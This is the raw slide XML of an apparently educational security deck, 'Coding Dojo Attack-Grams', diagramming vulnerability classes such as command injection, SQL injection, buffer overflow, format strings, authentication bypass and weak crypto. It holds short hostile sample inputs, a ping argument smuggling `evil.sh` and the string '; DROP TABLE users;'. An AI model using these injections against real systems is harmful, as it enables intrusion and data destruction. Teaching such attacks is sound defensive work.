              <a:gd name="adj2" fmla="val 43758"/>
              <a:gd name="adj3" fmla="val 13003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D64F8AEE-94E6-A644-AAFD-06A2904597B6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rot="16200000" flipH="1">
            <a:off x="2374577" y="2237974"/>
            <a:ext cx="607882" cy="671100"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -37606"/>
              <a:gd name="adj2" fmla="val 45322"/>
              <a:gd name="adj3" fmla="val 13760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EB8F141-975A-9445-92BC-6841FA4F3382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="0"/>
            <a:endCxn id="51" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1778934" y="2290281"/>
            <a:ext cx="538951" cy="589116"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42416"/>
              <a:gd name="adj2" fmla="val 44559"/>
              <a:gd name="adj3" fmla="val 14241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23E0F19-51A2-CC47-B438-25CD6E1F428B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577057" y="2071942"/>
            <a:ext cx="106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secret.txt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E328E-278A-7442-8F3C-EA6F3A1E6EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918399" y="4128926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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15055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08" y="211060"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS Command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35885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415371" y="3958618"/>
            <a:ext cx="794292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6523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host: ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`evil.sh`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3655849" y="1713471"/>
            <a:ext cx="183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Operating System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95267" y="2731350"/>
            <a:ext cx="1390072" cy="2748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476877" y="2398238"/>
            <a:ext cx="140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ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`evil.sh`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274B8A-335D-2B48-8F2A-F9464E60BD65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735854" y="1483119"/>
            <a:ext cx="1565654" cy="968623"/>
            <a:chOff x="5598337" y="1740622"/>
            <a:chExt cx="1565654" cy="968623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4D3CD47-A8BE-FE44-934A-CEC254E6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2DBF5B-A6D9-514A-9C58-D12A0123CE3E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5598337" y="1740622"/>
              <a:ext cx="156565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  <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>&gt;_ ping ABC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E4FC0B-F6B5-0F42-9245-357BDDE31023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735854" y="2808682"/>
            <a:ext cx="1565654" cy="968623"/>
            <a:chOff x="5598337" y="1740622"/>
            <a:chExt cx="1565654" cy="968623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A788ECB-1243-7D45-8C39-4DDBC643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E64D24A-A263-2B47-9840-83D81685C37D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5598337" y="1740622"/>
              <a:ext cx="15656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Courier" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>&gt;_ evil.sh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087CD7-8702-7340-A1C9-392E7FCD58C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28609" y="1967431"/>
            <a:ext cx="607245" cy="76666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23FCCC-F540-4E47-B9FD-2AF69959CC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28609" y="2734098"/>
            <a:ext cx="607245" cy="558896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A950698-BC74-594B-8707-84540191D50B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787471" y="1739791"/>
            <a:ext cx="11688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ping: cannot resolve ABC: Unknown host</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F4F4F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676C7C-C38B-8446-BEB1-19FE8E2A9937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847000" y="3149535"/>
            <a:ext cx="1168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)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13161" y="2152786"/>
            <a:ext cx="1157128" cy="11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291858" y="2376861"/>
            <a:ext cx="374855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user='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jsmith'</a:t>
            </a:r>
            <a:endParaRPr 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00" y="510127"/>
            <a:ext cx="10515600" cy="1325563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404801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392398" y="3981591"/>
            <a:ext cx="840238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8583"/>
            <a:ext cx="336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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: jsmith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'; DROP TABLE users;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5214275" y="1701099"/>
            <a:ext cx="212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Database Server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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379524" y="2624020"/>
            <a:ext cx="3393169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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{572399D8-748F-AC45-AD76-112D9DFA216B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772693" y="2130846"/>
            <a:ext cx="1135507" cy="1196945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4995991-3603-3845-9807-F79F8C4F854B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2379524" y="2949600"/>
            <a:ext cx="3393169" cy="2104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3713B9F-D68F-BB43-B597-5CDB227C7B17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360898" y="2729318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users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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0B9BF7-919B-5E48-BD95-2254B6030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96" t="2810" r="2087" b="69375"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084041" y="2427959"/>
            <a:ext cx="516151" cy="645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041B1-2741-6547-92D0-CA91B39733A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6003305" y="3002990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0C0E-6A15-D142-AC78-44D43BDF8531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6146171" y="2644969"/>
            <a:ext cx="356991" cy="325677"/>
            <a:chOff x="7809979" y="3941589"/>
            <a:chExt cx="356991" cy="3256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38C96-E54B-B541-AB6D-D146A8719848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm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0C55E6-7631-FB4E-82DA-47AB39B69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13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A49D4B-72A5-C448-9A50-999EF04C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54" y="2091058"/>
            <a:ext cx="1577870" cy="125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771D5-4396-A64B-92A9-9813AD3E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96" y="697816"/>
            <a:ext cx="1213852" cy="1139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1579E-0513-5E45-BA41-11B740E9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20" y="692668"/>
            <a:ext cx="1694622" cy="1149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691D6-A837-D849-9EFD-E8AD3DEB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177" y="692668"/>
            <a:ext cx="1654059" cy="1183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B8CBD-FDB9-BC4D-9B40-6F9B5ECC7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03" y="698918"/>
            <a:ext cx="1909527" cy="1322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FF93C-2CE1-2E47-9668-F625EB17E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098" y="696538"/>
            <a:ext cx="1807025" cy="131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C5B7A-231D-6843-B557-903B0CEE8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51" y="2091058"/>
            <a:ext cx="2251543" cy="1352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B4D8D-467F-E34C-B426-02291DE7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153" y="2091058"/>
            <a:ext cx="1747845" cy="124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0A52E-4D55-5B46-8058-59F0CE24C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8752" y="2125649"/>
            <a:ext cx="1583787" cy="146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A75357-2306-CE4F-B514-FE84A1C2B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434" y="2091058"/>
            <a:ext cx="1176640" cy="1090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D7D0F-54DA-D74A-9751-7E095168B1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554" y="3556362"/>
            <a:ext cx="1390494" cy="1350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DD429-D6C6-524E-A032-C15E5598A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3049" y="3579378"/>
            <a:ext cx="1491249" cy="1255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CE3D7-786A-2C4F-8C9B-FEA833786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456" y="3576739"/>
            <a:ext cx="1379382" cy="1310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1A5E8-8079-E741-A3FE-8FFD1D6DC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3548" y="3593467"/>
            <a:ext cx="1390237" cy="1329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7B54D-5257-D24C-BC28-38A3F231D6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1664" y="3600766"/>
            <a:ext cx="1189789" cy="132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BAA1D4-9F3C-6343-AF0D-BE65CC6F4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6098" y="5137363"/>
            <a:ext cx="1411362" cy="12338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187F77-DA8A-234E-89B7-0DE666CA55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1050" y="5071794"/>
            <a:ext cx="1440450" cy="117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65954D-4CBF-2440-825D-EC75C2075C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9017" y="5084428"/>
            <a:ext cx="1089332" cy="89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54DC8D-5982-8F4A-9300-20F7620616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7951" y="5075513"/>
            <a:ext cx="1515417" cy="8712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8F6FF6-7B85-274E-8A3B-CF9AEE5E6727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="12192000" cy="4521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Coding Dojo Attack-Grams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6C753D-6565-6345-8176-5124603034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42995" y="5071794"/>
            <a:ext cx="1306010" cy="1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46" y="284146"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Deserialization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23746" y="1567361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2037493" y="461393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276779" y="3481127"/>
            <a:ext cx="1380148" cy="885469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2806922" y="1240377"/>
            <a:ext cx="12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Book Store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DA788ECB-1243-7D45-8C39-4DDBC6432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8035" y="2468462"/>
            <a:ext cx="481538" cy="4946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64D24A-A263-2B47-9840-83D81685C37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9462347" y="2971520"/>
            <a:ext cx="15656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ourier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;_ evil.sh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6493" y="3782554"/>
            <a:ext cx="574890" cy="574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F1C7-EBA2-D743-BCF8-4F3D3CC427E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3902535" y="4389593"/>
            <a:ext cx="1467068" cy="1503826"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1467068" cy="150382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122F76F-F9BA-5441-A3B1-F0B9F3D9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BBAFDB9-FAD4-0A43-AF69-9B02F997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33081-5A63-BC4B-9B6D-9651E5A49B4B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5C85E3-28AC-224D-A834-9B429D7C2297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380195" y="4389536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Command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object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E1A5538-F591-B747-B811-49D8FA8FB749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="0"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3316284" y="3327091"/>
            <a:ext cx="1155806" cy="969197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E76D4CE3-4BEB-D240-BCC9-392C35D46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54048" y="3549830"/>
            <a:ext cx="872851" cy="872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7D80FF-70FD-DF41-943A-5F146FAE669C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4946269" y="4323189"/>
            <a:ext cx="8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 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64107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90" y="417074"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer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672631" y="1894246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2649099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291858" y="3125349"/>
            <a:ext cx="1380773" cy="12700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2217508" y="270255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AAAAA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4091002" y="153076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8417B-6E8F-C948-869E-EB06451FECDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095178" y="2500933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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a = 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i!\0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68609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4DE-F880-8F46-8A33-20B4851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770" y="572571"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format String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EDEA-D3D7-7649-9B73-CB3D6A2D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62244" y="1921995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FB2EBA0-4D4B-7D4F-82C1-633447B85343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1061187" y="2640368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D8AAA1-B068-2F40-B76F-2CFF92F9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AEA66F-F158-464B-9277-24D46AC0562A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B28343D-B571-C541-B65B-F510DBCE06B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24063" y="3111297"/>
            <a:ext cx="967670" cy="5321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A3458D-13E5-994D-9E89-E52D9F647BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2220704" y="276024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%x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ED6C8-88B1-A34F-88F1-4993933EC112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3296140" y="164008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E2566-DEF8-6C4D-8CB2-C5BECB081633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3122503" y="2910778"/>
            <a:ext cx="13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= </a:t>
            </a:r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0180200-4B58-C44C-857D-C52BCA6E31C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4647328" y="3098597"/>
            <a:ext cx="1086658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4438A7-C003-B64F-9779-C97132352804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4555281" y="2726112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printf("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>")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9A75FA-7A50-A54D-B0B9-579DCD82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839" r="2089" b="67679"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639766" y="2492785"/>
            <a:ext cx="1074974" cy="1265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E332A7-C84C-3C4E-83AF-5E3B8B8CE83B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5733986" y="20927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759A5F-2D0F-094D-98EA-8D679F299075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895087" y="28948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70034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90" y="70496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Authentication Bypass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19F13-0915-7446-9028-EC431BE4CA7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1398878" y="1408656"/>
            <a:ext cx="3480813" cy="3564836"/>
            <a:chOff x="1398878" y="1408656"/>
            <a:chExt cx="3480813" cy="35648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21913-DCA6-2749-BF68-9D3623614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3391047" y="1408656"/>
              <a:ext cx="718457" cy="926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86D53-E484-A94C-B33B-6CAD9A80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32962" r="2089" b="37637"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507314" y="1431834"/>
              <a:ext cx="718457" cy="872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D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507314" y="2237585"/>
              <a:ext cx="73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/login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9C724-D387-0645-AD03-15F0B8D33AA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3249244" y="2226979"/>
              <a:ext cx="117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768" y="3613109"/>
              <a:ext cx="952500" cy="9525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43C41B-0369-DF42-8D23-CD96297C5EB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1398878" y="3469666"/>
              <a:ext cx="1467068" cy="1503826"/>
              <a:chOff x="1345136" y="3444526"/>
              <a:chExt cx="1467068" cy="1503826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E9B8A2A-1A9D-7742-A5FF-32C355FA5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45136" y="3444526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3270576-9AC6-5147-9955-7029A4B4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0575" y="3627856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41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1345136" y="457902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Regular Users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384278" y="4551251"/>
              <a:ext cx="9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71BF70E-D78E-A54F-90D0-4E93C36FAC3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="18" idx="0"/>
              <a:endCxn id="8" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="1443071" y="3037608"/>
              <a:ext cx="862749" cy="1367"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3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B146178-72F2-974B-BB4F-8808455E4F27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 rot="5400000" flipH="1" flipV="1">
              <a:off x="2264842" y="1480713"/>
              <a:ext cx="735123" cy="1517286"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val -31097"/>
                <a:gd name="adj2" fmla="val 62076"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="444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56AD4CEB-26B0-0746-B537-EFE45C343400}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="17" idx="0"/>
              <a:endCxn id="9" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="3329646" y="3102737"/>
              <a:ext cx="1016798" cy="3946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D7DDE3-48F9-A349-B146-4C9BC97FFCC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3836072" y="3032514"/>
              <a:ext cx="1043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Forceful </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>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9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FADA-9348-7E49-984A-11398F0D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Reliance on Untrusted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ABB64-6D16-2349-BCE0-32B733F95B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2796000" y="1515126"/>
            <a:ext cx="2451158" cy="3511927"/>
            <a:chOff x="1330454" y="1615335"/>
            <a:chExt cx="2451158" cy="3511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A9AE37-2145-9C4C-BC83-67F42762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1468301" y="1615335"/>
              <a:ext cx="718457" cy="92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13674-7775-EC40-9FE8-8DCFCB69DC18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1330454" y="2488172"/>
              <a:ext cx="1173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B5670-6DBD-6243-9168-816AC175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1022" y="3819788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84BFD-7ED3-4642-8443-E772034B8333}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1461532" y="4757930"/>
              <a:ext cx="960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6C52721D-8D8E-444A-A815-8393BF6D18AB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rot="5400000" flipH="1" flipV="1">
              <a:off x="1436135" y="3338641"/>
              <a:ext cx="962284" cy="10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6E74D061-2B72-CF43-87C6-20F911F1E052}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2144228" y="3215593"/>
              <a:ext cx="1482058" cy="751042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I'm admin ;)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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2086B177-20BA-E248-AEC2-DA3E21E8DA39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299554" y="1615335"/>
              <a:ext cx="1482058" cy="751042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Hello admin!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9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42368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Missing/Incorrect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5078373" y="1260748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2039671" y="133788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039671" y="214364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5006714" y="2187548"/>
            <a:ext cx="86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/admin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649" y="3688055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914758" y="4640555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814967" y="3096905"/>
            <a:ext cx="1175083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rot="5400000" flipH="1" flipV="1">
            <a:off x="2568179" y="1599985"/>
            <a:ext cx="750925" cy="1075049"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30442"/>
              <a:gd name="adj2" fmla="val 6704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 rot="5400000" flipH="1" flipV="1">
            <a:off x="4083183" y="1531454"/>
            <a:ext cx="802757" cy="1187621"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28477"/>
              <a:gd name="adj2" fmla="val 69559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4355334" y="2673673"/>
            <a:ext cx="1043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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsing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95741-703D-094F-98A4-B6E2CE2F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3" t="2194" r="2456" b="66606"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3481167" y="1298909"/>
            <a:ext cx="718457" cy="92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3FAB9-066A-034C-8859-182C5EC6ED6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3426169" y="2157311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/limited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279155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 Encryption of Sensitive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507314" y="223758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0292" y="4101413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565021" y="510437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122903" y="3350556"/>
            <a:ext cx="1494496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5771" y="1868253"/>
            <a:ext cx="1622851" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72384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2144227" y="3655985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576181" y="1196117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4496981" y="13018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52414"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3848622" y="1959266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5775" y="4129717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6006986" y="5093131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E343B43-8C29-C14B-B106-F29A19F9789E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5574146" y="3201838"/>
            <a:ext cx="1522800" cy="332957"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -25676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5226796" y="3635029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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35139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 flipH="1">
            <a:off x="2116212" y="2232102"/>
            <a:ext cx="2008007" cy="2939203"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -171390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285886"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of a Broken Crypto Algorithm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79278438-1F32-8642-8F77-1921373ABF6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1204684" y="1675596"/>
            <a:ext cx="870558" cy="1330651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3253661" y="1675596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4798071" y="2013795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59FA23F-A456-8144-8165-48011C5A2E14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rot="5400000">
            <a:off x="1015319" y="4070411"/>
            <a:ext cx="1249288" cy="1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A6D62B-6B1A-F441-840D-3F665413C700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903992" y="3076435"/>
            <a:ext cx="147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CF9D6-1F8B-1342-B0B5-BBD8C44A0370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
